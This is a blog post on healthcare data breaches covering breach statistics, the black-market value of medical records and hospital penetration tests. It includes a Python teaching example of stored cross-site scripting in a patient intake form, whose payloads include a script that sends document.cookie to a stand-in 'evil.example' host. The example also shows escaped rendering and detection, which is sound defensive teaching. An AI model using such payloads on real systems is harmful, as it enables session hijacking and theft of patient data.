Petronella Blog Archive


The Mind Boggling Prevalence of Healthcare Hacks


In all of the discussions over Wall Street, border security, people’s wives, and hand size during this year’s presidential debates, cybersecurity has barely been mentioned by either party. This is especially troubling given the sheer scale of personal data lost through attacks on the health care industry, which is mind boggling.

In February of 2015 alone, Anthem disclosed that records of 78.8 million of its customers had been stolen. According to the Department of Health and Human Services, the medical records of 113 million patients were compromised last year. That works out to roughly one in three Americans, and so far in 2016 we’re averaging nearly four reported breaches a week.

According to John Halamka, CIO of Beth Israel Deaconess Medical Center in Boston, the hospital is attacked on average once every seven seconds. In 2011, 2,000 patient x-rays were stolen from the hospital by Chinese hackers, most likely to be sold to people who could not pass the health requirement for travel visas.

While it may surprise many, electronic medical records can be worth 100 times more than credit card numbers on the black market, with a single Medicare or Medicaid record possibly selling for $500. Each record contains everything an attacker needs to know about a person, including name, social security number, address, employer, and even their children’s names.

Breaches cost the health care industry around $5.6 billion a year, and it ranks second among all industries in number of data breaches. Unlike the financial industry, it has far fewer safeguards, even though its data is more valuable. When a credit card number is stolen, the issuer absorbs the fraudulent charges and simply reissues the card, so the victim typically loses no money; a stolen medical history or social security number cannot be reissued.

Over the last two years, Independent Security Evaluators ran a series of tests against the cybersecurity of 12 health care facilities and two health care data centers. By leaving USB drives loaded with malicious code lying around a hospital, they got into a computerized medicine dispensary; a hospital logo on the drive was enough to convince employees to plug it in and unwittingly run the code it contained. Through a lobby kiosk at another hospital, they reached patients’ bloodwork records. In another case, they filled out a new patient form online with malicious code in every field, so that when a doctor or nurse later opened the record, the code ran on the clinician’s system.
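The new-patient-form attack above is a stored injection: whatever the attacker types into the form is saved and later rendered, unescaped, into the page a clinician views. The following is an added example (not code from ISE, the hospitals tested, or the original post) that shows a constructed intake submission with script payloads in every field, a naive render that turns those payloads into live markup, and the hardened render that escapes on output. The function and record names are hypothetical; the parser-based detector stands in for what a browser would actually execute.

```python
import html
from html.parser import HTMLParser

# Constructed attacker submission: a script or event-handler payload in every
# field, mirroring the "malicious code in all the fields" test described above.
ATTACKER_SUBMISSION = {
    "name": '<script>fetch("https://evil.example/steal?c="+document.cookie)</script>',
    "dob": "<img src=x onerror=alert(1)>",
    "symptoms": "chest pain<script>alert('stored xss')</script>",
}

# In-memory stand-in for the hospital's patient database (constructed).
PATIENT_DB = []


def submit_intake(form):
    """Store the submitted fields verbatim, as a naive intake handler would.
    Returns the index of the stored record."""
    PATIENT_DB.append(dict(form))
    return len(PATIENT_DB) - 1


def render_record_vulnerable(record):
    """Build the chart page a nurse sees by concatenating stored fields
    straight into HTML. Any markup in a field becomes live code in the
    clinician's browser."""
    rows = "".join(f"<tr><th>{k}</th><td>{v}</td></tr>" for k, v in record.items())
    return f"<table>{rows}</table>"


def render_record_hardened(record):
    """Same page, but every stored value is HTML-escaped on output, so the
    payload is displayed as inert text instead of being executed."""
    rows = "".join(
        f"<tr><th>{html.escape(k)}</th><td>{html.escape(v)}</td></tr>"
        for k, v in record.items()
    )
    return f"<table>{rows}</table>"


class ActiveContentDetector(HTMLParser):
    """Parses a rendered page the way a browser would and records every
    <script> tag and every on* event-handler attribute it finds."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag} {name} handler")


def active_content(page):
    """Return the list of executable constructs present in a rendered page."""
    detector = ActiveContentDetector()
    detector.feed(page)
    return detector.findings


if __name__ == "__main__":
    idx = submit_intake(ATTACKER_SUBMISSION)
    rec = PATIENT_DB[idx]
    print("vulnerable render:", active_content(render_record_vulnerable(rec)))
    print("hardened render:  ", active_content(render_record_hardened(rec)))
```

The point of the detector is that the stored data is identical in both cases: the database is not where the bug lives. The fix is output encoding at the point where untrusted data meets the page (plus a Content-Security-Policy as defense in depth), not input filtering on the form, which the attacker controls.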

It’s hard to fully grasp the damage that could have been done had the attacks been real. At the very least, the testers could have altered the dosages of drugs administered to patients or switched patient records, and in some cases they could have modified the health records of every patient in the breached database.

Not every breach of information lies on the shoulders of the hospitals; some are the direct result of patients’ own choices. In a recent study, 81% of diabetes apps in the Google Play store lacked any sort of privacy policy. Of the apps that had one, 48.8% shared data with third parties, and 39% did so for advertising purposes. Users tend to assume that a medical app with a privacy policy keeps the health information they enter private, but that is not the case: HIPAA applies to providers, insurers and their business associates, not to most consumer apps, and no federal law restricts the sale of that information to third parties.

While hospitals have little control over which apps their patients use, they can do far more to train employees to recognize social engineering and phishing attacks. All the security software in the world can’t help if people keep opening attachments, plugging in found USB drives, or clicking links that lead straight to malicious code.